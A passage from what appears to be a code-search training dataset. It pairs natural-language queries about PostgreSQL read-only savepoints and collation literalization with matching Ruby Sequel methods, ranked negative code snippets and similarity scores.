"0.46558735",
"0.46419528",
"0.46411112",
"0.4633891",
"0.46318588",
"0.46311495",
"0.46309024",
"0.462721",
"0.46140617",
"0.46058443",
"0.46007103",
"0.45986104",
"0.45818996",
"0.45744225",
"0.45709264",
"0.45709264",
"0.45669696",
"0.45607695",
"0.45538485",
"0.45515293",
"0.45484987",
"0.4540121",
"0.45399892",
"0.4539105",
"0.45377868",
"0.45372474",
"0.45345998",
"0.45199692",
"0.45199692",
"0.45199692",
"0.45080295",
"0.45036337",
"0.44965398",
"0.44909868",
"0.44755977",
"0.44755977"
] |
0.7401804
|
1
|
Set the READ ONLY transaction setting per savepoint, as PostgreSQL supports that.
|
def begin_savepoint(conn, opts)
super
unless (read_only = opts[:read_only]).nil?
log_connection_execute(conn, "SET TRANSACTION READ #{read_only ? 'ONLY' : 'WRITE'}")
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def with_transaction(read_only: false, &block)\n @env.transaction(read_only, &block)\n end",
"def set_transaction_isolation(conn, opts)\n level = opts.fetch(:isolation, transaction_isolation_level)\n read_only = opts[:read_only]\n deferrable = opts[:deferrable]\n if level || !read_only.nil? || !deferrable.nil?\n sql = String.new\n sql << \"SET TRANSACTION\"\n sql << \" ISOLATION LEVEL #{Sequel::Database::TRANSACTION_ISOLATION_LEVELS[level]}\" if level\n sql << \" READ #{read_only ? 'ONLY' : 'WRITE'}\" unless read_only.nil?\n sql << \" #{'NOT ' unless deferrable}DEFERRABLE\" unless deferrable.nil?\n log_connection_execute(conn, sql)\n end\n end",
"def transaction_disabled=(_arg0); end",
"def force_begin_read_write\n @grpc_transaction = @connection.session.create_transaction\n end",
"def read_only\n false\n end",
"def read_only\n true\n end",
"def set_repository_writable!\n with_lock do\n raise ActiveRecord::RecordNotSaved, _('Database update failed') unless\n _update_repository_read_only_column(false)\n\n nil\n end\n end",
"def transaction_disabled; end",
"def set_readonly\n readonly! if persisted? && !parent\n end",
"def read_only_recommended\n @read_only = 2\n end",
"def read_only?; end",
"def read_only?; end",
"def transaction_isolation_levels\n {\n read_committed: 'READ COMMITTED',\n repeatable_read: 'REPEATABLE READ',\n serializable: 'SERIALIZABLE'\n }\n end",
"def use_transactions; end",
"def use_transactions; end",
"def txn_read_preference\n rp = txn_options[:read] ||\n @client.read_preference\n Mongo::Lint.validate_underscore_read_preference(rp)\n rp\n end",
"def set_readonly_option!(options) #:nodoc:\n if options[:piggy]\n options[:readonly] = true\n else\n old_set_readonly_option!(options)\n end\n end",
"def set_repository_read_only!(skip_git_transfer_check: false)\n with_lock do\n raise RepositoryReadOnlyError, _('Git transfer in progress') if\n !skip_git_transfer_check && git_transfer_in_progress?\n\n raise RepositoryReadOnlyError, _('Repository already read-only') if\n _safe_read_repository_read_only_column\n\n raise ActiveRecord::RecordNotSaved, _('Database update failed') unless\n _update_repository_read_only_column(true)\n\n nil\n end\n end",
"def set_readonly_access(grant_access=true, manual_set=false)\n unless Rails.env.test? || self.queued_for_deletion || self.detached\n if manual_set || self.public_changed? || self.new_record?\n if self.firecloud_workspace.present? && self.firecloud_project.present? && ApplicationController.read_only_firecloud_client.present?\n access_level = self.public? ? 'READER' : 'NO ACCESS'\n if !grant_access # revoke all access\n access_level = 'NO ACCESS'\n end\n Rails.logger.info \"#{Time.zone.now}: setting readonly access on #{self.name} to #{access_level}\"\n readonly_acl = ApplicationController.firecloud_client.create_workspace_acl(ApplicationController.read_only_firecloud_client.issuer, access_level, false, false)\n ApplicationController.firecloud_client.update_workspace_acl(self.firecloud_project, self.firecloud_workspace, readonly_acl)\n end\n end\n end\n end",
"def is_read_only=(value)\n @is_read_only = value\n end",
"def autocommit=(value)\n raise NoMethodError, \"Not implemented for this raw driver\"\n end",
"def enable_doublewrite()\n PureHailDB.ib_cfg_set(\"doublewrite\", :bool, true)\n end",
"def set_transaction_variables\n sessionFactory = HibernateUtil.getSessionFactory(\"serverconf\")\n dialect = sessionFactory.getDialect\n if dialect.class == Java::EeRiaXroadCommonDb::CustomPostgreSQLDialect\n # If we are running on top of Postgres, the name of the logged-in\n # user must be made available within the transaction, for use\n # when updating the history table.\n # The value of user_name will go out of scope when the transaction\n # ends.\n query = @session.createSQLQuery(\n \"SET LOCAL xroad.user_name='#{current_user.name}'\")\n query.executeUpdate()\n end\n end",
"def readonly!\n @readonly = true\n end",
"def synchronous_commit=(value)\n raise ArgumentError, \"argument must be true or false\" unless value == true || value == false\n\n execute \"SET #{'LOCAL' if open_transactions > 0} synchronous_commit TO #{value ? 'ON' : 'OFF'}\"\n end",
"def readonly! #:nodoc:\n @readonly = true\n end",
"def begin_transaction read_only: nil, previous_transaction: nil, read_time: nil\n if read_only\n transaction_options = Google::Cloud::Datastore::V1::TransactionOptions.new\n transaction_options.read_only = \\\n Google::Cloud::Datastore::V1::TransactionOptions::ReadOnly.new \\\n read_time: read_time_to_timestamp(read_time)\n\n end\n if previous_transaction\n transaction_options ||= \\\n Google::Cloud::Datastore::V1::TransactionOptions.new\n rw = Google::Cloud::Datastore::V1::TransactionOptions::ReadWrite.new(\n previous_transaction: previous_transaction.encode(\"ASCII-8BIT\")\n )\n transaction_options.read_write = rw\n end\n service.begin_transaction project_id: project, database_id: database, transaction_options: transaction_options\n end",
"def supports_transaction_isolation_levels?\n false\n end",
"def set_default_permissions!\n # Always allow to read the id\n let :read, :id\n # These shouldn't change after the first save.\n let :write, [ :id, :created_at ], :if => :new?\n # These can always change.\n let :write, :updated_at\n end",
"def supports_transaction_isolation?\n false\n end",
"def supports_transaction_isolation?\n false\n end",
"def autocommit=(p1)\n #This is a stub, used for indexing\n end",
"def set_locking_strategy\n if @config.enable_locking\n @lock = Aws::SessionStore::DynamoDB::Locking::Pessimistic.new(@config)\n else\n @lock = Aws::SessionStore::DynamoDB::Locking::Null.new(@config)\n end\n end",
"def read_only! key\n set_data! key, :read_only, true\n self\n end",
"def readwrite_user\n super\n end",
"def readonly\n true\n end",
"def mark_as_read()\n update_attribute('read', true)\n end",
"def supports_transaction_isolation?\n true\n end",
"def disable_doublewrite()\n PureHailDB.ib_cfg_set(\"doublewrite\", :bool, false)\n end",
"def within_transaction; end",
"def within_transaction; end",
"def supports_transaction_isolation_levels?\n true\n end",
"def read_only?\n !!(@db && @db.graph && @db.read_only?)\n end",
"def supports_transaction_isolation_levels?\n true\n end",
"def run_in_transaction isolation\n if isolation\n Base.transaction isolation: isolation do\n yield\n end\n else\n yield\n end\n end",
"def run_in_transaction isolation\n if isolation\n Base.transaction isolation: isolation do\n yield\n end\n else\n yield\n end\n end",
"def paranoid_permissions\n true\n end",
"def add_txn_opts!(command, read)\n command.tap do |c|\n # The read concern should be added to any command that starts a transaction.\n if starting_transaction?\n # https://jira.mongodb.org/browse/SPEC-1161: transaction's\n # read concern overrides collection/database/client read concerns,\n # even if transaction's read concern is not set.\n # Read concern here is the one sent to the server and may\n # include afterClusterTime.\n if rc = c[:readConcern]\n rc = rc.dup\n rc.delete(:level)\n end\n if txn_read_concern\n if rc\n rc.update(txn_read_concern)\n else\n rc = txn_read_concern.dup\n end\n end\n if rc.nil? || rc.empty?\n c.delete(:readConcern)\n else\n c[:readConcern ] = Options::Mapper.transform_values_to_strings(rc)\n end\n end\n\n # We need to send the read concern level as a string rather than a symbol.\n if c[:readConcern]\n c[:readConcern] = Options::Mapper.transform_values_to_strings(c[:readConcern])\n end\n\n if c[:commitTransaction]\n if max_time_ms = txn_options[:max_commit_time_ms]\n c[:maxTimeMS] = max_time_ms\n end\n end\n\n # The write concern should be added to any abortTransaction or commitTransaction command.\n if (c[:abortTransaction] || c[:commitTransaction])\n if @already_committed\n wc = BSON::Document.new(c[:writeConcern] || txn_write_concern || {})\n wc.merge!(w: :majority)\n wc[:wtimeout] ||= 10000\n c[:writeConcern] = wc\n elsif txn_write_concern\n c[:writeConcern] ||= txn_write_concern\n end\n end\n\n # A non-numeric write concern w value needs to be sent as a string rather than a symbol.\n if c[:writeConcern] && c[:writeConcern][:w] && c[:writeConcern][:w].is_a?(Symbol)\n c[:writeConcern][:w] = c[:writeConcern][:w].to_s\n end\n end\n end",
"def transactional\n @transactional ||= getTransactionalData()\n end",
"def txn_read_concern\n # Read concern is inherited from client but not db or collection.\n txn_options[:read_concern] || @client.read_concern\n end",
"def set_transaction_isolation(conn, opts)\n level = opts.fetch(:isolation, transaction_isolation_level)\n if (jdbc_level = JDBC_TRANSACTION_ISOLATION_LEVELS[level]) &&\n conn.getMetaData.supportsTransactionIsolationLevel(jdbc_level)\n _trans(conn)[:original_jdbc_isolation_level] = conn.getTransactionIsolation\n log_connection_yield(\"Transaction.isolation_level = #{level}\", conn){conn.setTransactionIsolation(jdbc_level)}\n end\n end",
"def readonly?; true; end",
"def readonly?; true; end",
"def readonly?; true; end",
"def transaction(&block)\n self['AutoCommit'] = false\n self.do_transaction(&block)\n self['AutoCommit'] = true\n end",
"def read_permitted?\n true\n end",
"def with_optional_transaction(bool, &block)\n bool ? transaction { yield } : yield\n end",
"def mark_as_read!\n update_attributes(read: true)\n end",
"def readonly?\n options[:read_only] == true\n end",
"def locked_transaction(&block)\n unless connection.open_transactions.zero?\n raise \"locked_transaction cannot be called from within another transaction!\"\n end\n unsafe_locked_transaction do\n yield if block_given?\n end\n end",
"def ignore_transaction\n builder.ignore_transaction if builder\n end",
"def create_or_update_with_paranoid\n self.class.disable_paranoid { create_or_update_without_paranoid }\n end",
"def persistence_mode\n super\n end",
"def set_readwrite_user(opts)\n opts = check_params(opts,[:rw_user_info])\n super(opts)\n end",
"def mark_as_read\n update_attributes(is_read: true)\n end",
"def begin_db_transaction\n @transaction = @connection.transaction('READ COMMITTED')\n end",
"def test_supports_transaction_isolation\n assert ActiveRecord::Base.connection.supports_transaction_isolation?\n\n assert ActiveRecord::Base.connection.supports_transaction_isolation_level?(:read_uncommitted)\n assert ActiveRecord::Base.connection.supports_transaction_isolation_level?(:read_committed)\n assert ActiveRecord::Base.connection.supports_transaction_isolation_level?(:repeatable_read)\n assert ActiveRecord::Base.connection.supports_transaction_isolation_level?(:serializable)\n end",
"def target_sql_mode=(_arg0); end",
"def mark_as_read\n self.update(read: true)\n end",
"def read_only?\n @read_only\n end",
"def autocommit(flag)\n query \"set autocommit=#{flag ? 1 : 0}\"\n self\n end",
"def read_data_permitted?\n return write_data_permitted?\n end",
"def run(*args, &block)\n Sequel::Model.db.transaction(rollback: :always, auto_savepoint: true) { super }\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def mark_as_read\n update_attributes(:is_read => true)\n end",
"def mark_as_read\n update_attributes(:is_read => true)\n end",
"def with_transaction(&block)\n base_model.transaction(&block)\n end",
"def transaction(opts={:auto_enable => false})\n @transaction_level||=0\n @transaction_level+=1\n session do\n raise_if_transaction_running\n @transaction ||= true\n raise Error.cannot_obtain_transaction_lock if not lock_transaction\n begin\n yield\n # get_transaction in case cfgsave or cfgenable was run in transaction block\n # if there is no transaction we do not need to run it\n # if there is transaction but opend by someone else then t\n cfg_save if @transaction_level==1 && get_transaction\n rescue => e\n abort_transaction\n raise e\n end \n end\n ensure\n @transaction_level-=1\n @transaction = nil if @transaction_level==0\n end",
"def supports_prepared_transactions?\n false\n end",
"def supports_transactional_ddl?\n false\n end",
"def read_only?\n @read_only\n end",
"def set_persistence_mode(opts)\n opts = check_params(opts,[:modes])\n super(opts)\n end",
"def request_is_readonly?\n true\n end",
"def disable_rollback\n data[:disable_rollback]\n end",
"def begin_db_transaction\n @connection.autocommit = false\n end",
"def supports_transactional_ddl?\n true\n end",
"def transaction(mode = :deferred, &block)\n @db.transaction(mode, &block)\n end",
"def read_only\n @attributes[:read_only]\n end",
"def test_should_not_crash_selects_in_the_double_read_only_window\n ActiveRecord::Base.connection\n $mysql_master.set_rw(false)\n $mysql_slave.set_rw(false)\n assert_equal $mysql_master, master_connection\n 100.times do\n User.first\n end\n end"
] |
[
"0.6960527",
"0.6353735",
"0.62602395",
"0.60868007",
"0.6068373",
"0.60130394",
"0.5990826",
"0.58925563",
"0.5890557",
"0.5845283",
"0.57550824",
"0.57550824",
"0.5740366",
"0.56175214",
"0.56175214",
"0.55855775",
"0.5568516",
"0.5552127",
"0.55378616",
"0.5520403",
"0.5509703",
"0.55085033",
"0.55032367",
"0.5497485",
"0.5467872",
"0.54586643",
"0.5429937",
"0.53990924",
"0.53987795",
"0.5357913",
"0.5357913",
"0.53440535",
"0.5339869",
"0.5329696",
"0.5321719",
"0.5308512",
"0.53052396",
"0.5301688",
"0.5289729",
"0.528566",
"0.528566",
"0.52832043",
"0.52769077",
"0.527017",
"0.52494043",
"0.52494043",
"0.52447814",
"0.5241454",
"0.52355963",
"0.5232266",
"0.519545",
"0.5176758",
"0.5176758",
"0.5176758",
"0.5176706",
"0.5170364",
"0.51552075",
"0.5149747",
"0.51404643",
"0.51283324",
"0.51092565",
"0.5095564",
"0.5072108",
"0.50644314",
"0.505984",
"0.50591266",
"0.5053773",
"0.5035983",
"0.50323135",
"0.50250393",
"0.5024039",
"0.502181",
"0.50194377",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.5010293",
"0.5010293",
"0.5005136",
"0.5003005",
"0.49844667",
"0.49840957",
"0.4981584",
"0.4979045",
"0.4972563",
"0.49719766",
"0.49685383",
"0.49676338",
"0.49651602",
"0.49616447",
"0.4925767"
] |
0.7488052
|
0
|
Literalize nonString collate options. This is because unquoted collatations are folded to lowercase, and PostgreSQL used mixed case or capitalized collations.
|
def column_definition_collate_sql(sql, column)
if collate = column[:collate]
collate = literal(collate) unless collate.is_a?(String)
sql << " COLLATE #{collate}"
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def collation\n nil\n end",
"def collation\n select_value(\n \"SELECT pg_database.datcollate\" <<\n \" FROM pg_database\" <<\n \" WHERE pg_database.datname LIKE '#{current_database}'\",\n 'SCHEMA')\n end",
"def column_definition_collate_sql(sql, column)\n if collate = column[:collate]\n sql << \" COLLATE #{collate}\"\n end\n end",
"def set_standard_conforming_strings\n if postgresql_version >= 80200 # N/A (or read-only in PG 8.1)\n self.standard_conforming_strings=(true)\n end\n # AR 4.2 no longer does the hustle since its claiming PG >= 8.2\n # ... execute('SET standard_conforming_strings = on', 'SCHEMA')\n end",
"def set_standard_conforming_strings\n execute('SET standard_conforming_strings TO ON') rescue nil\n end",
"def collation\n show_variable \"collation_database\"\n end",
"def prepare_column_options(column)\n super.tap do |spec|\n spec[:encoding] = \"'#{column.sql_type_metadata.encoding}'\" if column.sql_type_metadata.encoding.present?\n end\n end",
"def collation\n @collation ||= show_variable('collation_connection') || 'utf8_general_ci'\n end",
"def column_schema_to_ruby_default_fallback(default, options)\n if default.is_a?(String) && options[:same_db] && use_column_schema_to_ruby_default_fallback?\n default = default.dup\n def default.inspect\n \"Sequel::LiteralString.new(#{super})\"\n end\n default\n end\n end",
"def collation_enabled?\n $collation_enabled ||= scanned_client_server!.features.collation_enabled?\nend",
"def get_string_normalization_options\n\t\tdic = @db::Dictionary.where(:title => @dic_name).first\n\t\treturn { lowercased: dic[:lowercased], hyphen_replaced: dic[:hyphen_replaced], stemmed: dic[:stemmed] } if dic.present?\n\tend",
"def sanitize_select_options(options)#:nodoc:\n o = options.dup\n select = o.delete :select\n o[:override_select] = select ? select_column_sql(select) : ' * '\n o\n end",
"def collation\n 'ucs_binary'\n end",
"def standard_conforming_strings=(enable)\n client_min_messages = self.client_min_messages\n begin\n self.client_min_messages = 'panic'\n value = enable ? \"on\" : \"off\"\n execute(\"SET standard_conforming_strings = #{value}\", 'SCHEMA')\n @standard_conforming_strings = ( value == \"on\" )\n rescue\n @standard_conforming_strings = :unsupported\n ensure\n self.client_min_messages = client_min_messages\n end\n end",
"def flag_option_sql(attrs, key, off=\"NO#{key}\".upcase, on=key.to_s.upcase, implicit=IMPLICIT_FLAG_ATTRIBUTES[key])\n\t case attrs[key]\n\t when NilClass, implicit\n\t when TrueClass then on\n\t when FalseClass then off\n\t else raise Error, \"Unsupported or invalid #{key} option\"\n\t end\n\t end",
"def _format_sql(sql)\n sql = sql.delete '\"'\n sql.downcase\n end",
"def uses_clob_for_text?\n false\n end",
"def prepare_options\n normalize_options\n String.allow_color = !options[:no_color]\n end",
"def encode_options\n {invalid: :replace, undef: :replace, replace: '?'}\n end",
"def column_schema_to_ruby_default_fallback(default, options)\n if default.is_a?(String) && options[:same_db] && use_column_schema_to_ruby_default_fallback?\n default = default.to_s\n def default.inspect\n \"#{super}.lit\"\n end\n default\n end\n end",
"def supports_index_collation?\n false\n end",
"def canonical_syntax_strings\n @canonical_syntax_strings ||= flag_syntax.map(&:canonical_str)\n end",
"def collation\n if @object.kind_of?(Linkage::Data)\n @object.collation\n else\n nil\n end\n end",
"def non_sql_option?(key)\n NON_SQL_OPTIONS.include?(key)\n end",
"def convert_boolean_strings\n %i{ambiguous_ref_bases use_all_contigs include_low_hmes polyploidy}.each do | symbol |\n if @options.key?(symbol)\n @options[symbol] = @options[symbol] == 'false' ? false : true\n end\n end\n end",
"def set_standard_conforming_strings\n self.standard_conforming_strings=(true)\n end",
"def sql_valuify\n nil? ? 'NULL' : \"'#{to_s.gsub(/\\\\/, '\\&\\&').gsub(/'/, \"''\").gsub(/\\t/, \"\\\\t\").gsub(/\\r/, \"\\\\r\").gsub(/\\n/, \"\\\\n\")}'\"\n end",
"def collation=(value)\n @collation = value\n end",
"def sql_modes; end",
"def collation\n return @collation\n end",
"def sql_string\n StringExpression.new(:NOOP, self)\n end",
"def sql_string\n StringExpression.new(:NOOP, self)\n end",
"def substitute_from_config_libraries(sql)\n Admin::ConfigLibrary.make_substitutions! sql, :sql\n sql\n end",
"def table_options_sql(options)\n\t sql = []\n\t sql << flag_option_sql(options, :parallel)\n\t sql << flag_option_sql(options, :logging)\n\t sql << flag_option_sql(options, :monitoring)\n\t sql << \"TABLESPACE #{quote_identifier(options[:tablespace])}\" if options[:tablespace]\n\t sql << compress_option_sql(options)\n\t sql << options[:options] if String === options[:options]\n\t sql.compact.join ' '\n\t end",
"def unquoted\n with_opts(:quoted=>false)\n end",
"def create_language_sql(name, opts=OPTS)\n \"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{\" HANDLER #{opts[:handler]}\" if opts[:handler]}#{\" VALIDATOR #{opts[:validator]}\" if opts[:validator]}\"\n end",
"def column_references_sql(options)\n sql = [super(options)]\n\t sql << flag_option_sql(options, :rely)\n\t sql << flag_option_sql(options, :enable, 'DISABLE')\n\t sql << flag_option_sql(options, :validate)\n\t sql.join ' '\n end",
"def options_with_escape\n @options.reject { |k,v| k == :eager_loaded }\n end",
"def literal_string_append(sql, v)\n sql << \"'\" << v.gsub(\"'\", \"''\") << \"'\"\n end",
"def frozen_string_literal_specified?; end",
"def prefer_unicode\n context[:prefer_unicode]\n end",
"def can_perform_case_insensitive_comparison_for?(column)\n @case_insensitive_cache ||= {}\n @case_insensitive_cache[column.sql_type] ||= begin\n sql = <<-end_sql\n SELECT exists(\n SELECT * FROM pg_proc\n WHERE proname = 'lower'\n AND proargtypes = ARRAY[#{quote column.sql_type}::regtype]::oidvector\n ) OR exists(\n SELECT * FROM pg_proc\n INNER JOIN pg_cast\n ON ARRAY[casttarget]::oidvector = proargtypes\n WHERE proname = 'lower'\n AND castsource = #{quote column.sql_type}::regtype\n )\n end_sql\n select_value(sql, 'SCHEMA')\n end\n end",
"def options_for(table)\n result = execute(\"show table status like '#{table}'\")\n engine = result.first[1]\n if engine !~ /inno/i #inno is default so do nothing for it in order not to clutter the migration\n \"ENGINE=#{engine}\" \n else\n nil\n end\n end",
"def _normalize_options(options); end",
"def camelize_options(options)\n options.dup.each do |k,v|\n options[k.to_s.split('_').inject([]){|c,word| c.push(c.empty? ? word : word.capitalize)}.join] = v\n end\n end",
"def generate_upsert_options\n if options.empty?\n ''\n else\n ' USING ' <<\n options.map do |key, value|\n serialized_value =\n case key\n when :consistency then value.to_s.upcase\n when :timestamp then (value.to_f * 1_000_000).to_i\n else value\n end\n \"#{key.to_s.upcase} #{serialized_value}\"\n end.join(' AND ')\n end\n end",
"def literalize(name); end",
"def connection_configuration_sqls(opts=@opts)\n sqls = []\n\n sqls << \"SET standard_conforming_strings = ON\" if typecast_value_boolean(opts.fetch(:force_standard_strings, true))\n\n cmm = opts.fetch(:client_min_messages, :warning)\n if cmm && !cmm.to_s.empty?\n cmm = cmm.to_s.upcase.strip\n unless VALID_CLIENT_MIN_MESSAGES.include?(cmm)\n raise Error, \"Unsupported client_min_messages setting: #{cmm}\"\n end\n sqls << \"SET client_min_messages = '#{cmm.to_s.upcase}'\"\n end\n\n if search_path = opts[:search_path]\n case search_path\n when String\n search_path = search_path.split(\",\").map(&:strip)\n when Array\n # nil\n else\n raise Error, \"unrecognized value for :search_path option: #{search_path.inspect}\"\n end\n sqls << \"SET search_path = #{search_path.map{|s| \"\\\"#{s.gsub('\"', '\"\"')}\\\"\"}.join(',')}\"\n end\n\n sqls\n end",
"def options_text(alt_option_config_attr = nil)\n alt_option_config_attr ||= self.class.option_configs_attr\n return unless alt_option_config_attr\n\n send(alt_option_config_attr).dup\n end",
"def sql_literal(object)\n object.literal(to_s)\n end",
"def code_point_collation_elements(code_points)\n explicit_collation_elements(code_points) || implicit_collation_elements(code_points)\n end",
"def type_literal_generic_string(column)\n if column[:text]\n :text\n elsif column[:fixed]\n \"char(#{column[:size]||default_string_column_size})\"\n elsif column[:text] == false || column[:size]\n \"varchar(#{column[:size]||default_string_column_size})\"\n else\n :text\n end\n end",
"def with_quoted_identifiers(s)\n s.gsub(/\"(\\w+)\"/) { |m|\n if ActiveRecord::Base.configurations[:test]['adapter'] =~ /oracle/i\n m.upcase\n else\n m\n end\n }\n end",
"def literal(v)\n case v\n when LiteralString\n v\n when String\n \"'#{v.gsub(/\\\\/, \"\\\\\\\\\\\\\\\\\").gsub(/'/, \"''\")}'\"\n when Integer, Float\n v.to_s\n when BigDecimal\n v.to_s(\"F\")\n when NilClass\n NULL\n when TrueClass\n BOOL_TRUE\n when FalseClass\n BOOL_FALSE\n when Symbol\n symbol_to_column_ref(v)\n when ::Sequel::SQL::Expression\n v.to_s(self)\n when Array\n v.all_two_pairs? ? literal(v.sql_expr) : (v.empty? ? '(NULL)' : \"(#{v.collect{|i| literal(i)}.join(COMMA_SEPARATOR)})\")\n when Hash\n literal(v.sql_expr)\n when Time, DateTime\n v.strftime(TIMESTAMP_FORMAT)\n when Date\n v.strftime(DATE_FORMAT)\n when Dataset\n \"(#{v.sql})\"\n else\n raise Error, \"can't express #{v.inspect} as a SQL literal\"\n end\n end",
"def compress_option_sql(attrs)\n\t case value=attrs[:compress]\n\t when Fixnum, Integer then \"COMPRESS(#{value})\"\n\t else flag_option_sql attrs, :compress\n\t end\n end",
"def force_string!(*keys)\n keys.each do |h|\n raise UserError, \"force_string!: #{h} not a column in table\" unless column(h)\n\n column(h).force_string!\n end\n self\n end",
"def to_sparql(**options)\n \"UCASE(\" + operands.last.to_sparql(**options) + \")\"\n end",
"def ignored_translation_table_colums(klass); end",
"def sql_quote(value)\n value = value.to_s.downcase if %i[nil null NULL].include?(value)\n # noinspection RubyMismatchedReturnType\n case value\n when nil, 'nil', 'null', 'NULL' then nil\n when /^-?\\d+$/ then value.to_i\n when SQL_NUMBER then value.to_f\n when String, Symbol then \"'#{value}'\"\n else value\n end\n end",
"def literal_string_append(sql, v)\n sql << \"'\" << db.synchronize(@opts[:server]){|c| c.escape(v)} << \"'\"\n end",
"def literal_string_append(sql, v)\n sql << \"'\" << db.synchronize(@opts[:server]){|c| c.escape_string(v)} << \"'\"\n end",
"def connection_configuration_sqls\n sqls = super\n sqls << \"SET DateStyle = 'ISO'\" if @use_iso_date_format\n sqls\n end",
"def create_table_statement(model)\n \"#{super} ENGINE = InnoDB CHARACTER SET #{character_set} COLLATE #{collation}\"\n end",
"def camelize( option=nil )\n if option == :lower\n String.string_camelize(self, false)\n else\n String.string_camelize(self)\n end\n end",
"def test_mysql_text_not_null_defaults_non_strict\n using_strict(false) do\n with_text_blob_not_null_table do |klass|\n assert_equal '', klass.columns_hash['non_null_blob'].default\n assert_equal '', klass.columns_hash['non_null_text'].default\n\n assert_nil klass.columns_hash['null_blob'].default\n assert_nil klass.columns_hash['null_text'].default\n\n instance = klass.create!\n\n assert_equal '', instance.non_null_text\n assert_equal '', instance.non_null_blob\n\n assert_nil instance.null_text\n assert_nil instance.null_blob\n end\n end\n end",
"def literal_string_append(sql, v)\n sql << \"'\" << ::Mysql.quote(v) << \"'\"\n end",
"def prepare_for_sql_in_clause\n \"(#{self.to_string_no_brackets})\"\n end",
"def literal_string_append(sql, v)\n sql << APOS << db.synchronize{|c| c.escape_string(v)} << APOS\n end",
"def select_table_options_sql(sql)\n sql << \" WITH #{@opts[:table_options]}\" if @opts[:table_options]\n end",
"def literal_string_append(sql, v)\n db.synchronize(@opts[:server]){|c| sql << c.quote(v)}\n end",
"def _literal_table_sort(tables)\n tables.sort_by{|s| literal(s)}\n end",
"def type_literal_generic_string(column)\n if column[:text]\n uses_clob_for_text? ? :clob : :text\n elsif column[:fixed]\n \"char(#{column[:size]||default_string_column_size})\"\n else\n \"varchar(#{column[:size]||default_string_column_size})\"\n end\n end",
"def variant_column\n \"option_value_#{ order_in_good }\"\n end",
"def make_sql_friendly( name )\n return name.strip.gsub( \"'\", \"''\" )\n end",
"def build_mode_from_options(options)\n if options[:mode]\n case options[:mode]\n when String\n return options[:mode]\n when Symbol\n return options[:mode].to_s.upcase\n else\n raise TypeError.new(INVALID_TYPE_MSG)\n end\n else\n return \"ASC\"\n end\n end",
"def target_sql_mode=(_arg0); end",
"def lit(*args)\n args.empty? ? self : SQL::PlaceholderLiteralString.new(self, args)\n end",
"def collate!(other_hash)\n replace(collate(other_hash))\n end",
"def literal_string_append(sql, s)\n sql << APOS << s.to_s.gsub(STRING_ESCAPE_RE){|m| STRING_ESCAPES[m]} << APOS\n end",
"def get_database_option(value)\n return value.nil? ? nil : \"Initial Catalog=#{value}\"\n end",
"def sql_strings(value)\n case value\n when String\n \"'#{value}'\"\n when Numeric\n value.to_s\n else\n \"null\"\n end\n end",
"def literal_string(v)\n \"'#{v.gsub(\"'\", \"''\")}'\"\n end",
"def generate_upsert_options\n if options.empty?\n ''\n else\n ' USING ' <<\n options.map do |key, value|\n serialized_value =\n case key\n when :timestamp then (value.to_f * 1_000_000).to_i\n else value\n end\n \"#{key.to_s.upcase} #{serialized_value}\"\n end.join(' AND ')\n end\n end",
"def sanitize_field_options(options={})\n options.stringify_keys.reject {|k, v| %w(vertical_align label edit req lock auto popup url position help).include?(k)}.symbolize_keys\n end",
"def `(s)\n Sequel::Deprecation.deprecate(\"Using Sequel#VirtualRow#` to create a literal SQL fragment\", \"Use Sequel.lit instead\")\n Sequel::LiteralString.new(s)\n end",
"def quote_column_if_needed(column); end",
"def set_locale_from_options_inline\n <<-EOL\nif options[:locale]\n #{\"Mobility.enforce_available_locales!(options[:locale])\" if I18n.enforce_available_locales}\n locale = options[:locale].to_sym\n options[:locale] &&= !!locale\nelse\n locale = Mobility.locale\nend\nEOL\n end",
"def initialize(opts = {})\n opts = opts.dup\n pg_version = opts.delete(:pg_version)\n if pg_version.is_a?( String )\n pg_version = pg_version.split( '.' ).map( &:to_i )\n end\n pg_version ||= []\n\n super\n\n # Phrase support starts in 9.6\n if ( pg_version <=> [9,6] ) >= 0\n # Handle what PG-sensitive chracters we can early as\n # whitespace. This can't include anything part of HumanQL,\n # e.g. ':' as used for scopes, so deal with the remainder\n # below.\n self.spaces = /[[:space:]*!<>\\0\\\\]+/.freeze\n else\n # Disable quote tokens\n self.lquote = nil\n self.rquote = nil\n # As above but add DQUOTE as well.\n self.spaces = /[[:space:]*!<>\\0\\\\\"]+/.freeze\n end\n\n # Use by custom #norm_phrase_tokens as a superset of the\n # #lparen, #rparen token patterns removed by default. In\n # PostgreSQL, the '|' and '&' still need to be filtered. Other\n # freestanding punctuation tokens are best removed entirely.\n @phrase_token_rejects = /\\A[()|&':]\\z/.freeze\n\n # SQUOTE is a problem only when at beginning of term.\n @lead_squote = /\\A'/.freeze\n\n # COLON is always a problem, but since its also part of Human QL\n # (scopes) it can't be included earlier in #spaces. Also per\n # scope parsing rules, its not always made a separate token.\n @term_rejects = /:/.freeze\n end",
"def quoteoptions()\n fail \"Not yet implemented\"\n end",
"def sql_literal(value)\n Arel::Nodes::SqlLiteral.new(value)\n end",
"def type_literal_specific(column)\n type = column[:type]\n type = \"double precision\" if type.to_s == 'double'\n column[:size] ||= default_string_column_size if type.to_s == 'varchar'\n elements = column[:size] || column[:elements]\n \"#{type}#{literal(Array(elements)) if elements}#{' UNSIGNED' if column[:unsigned]}\"\n end",
"def quote(value, column = nil)\n case value\n when String, ActiveSupport::Multibyte::Chars\n value_S = value.to_s\n if column && column.type == :binary && column.class.respond_to?(:string_to_binary)\n \"'#{column.class.string_to_binary(value_S)}'\"\n else\n super(value, column)\n end\n else\n super(value, column)\n end\n end",
"def get_combobox_options(params)\n column_name = params[:column]\n CONDITIONS.each { |c| column_name.sub!(/_#{c}$/, \"\") }\n super(:column => column_name)\n end",
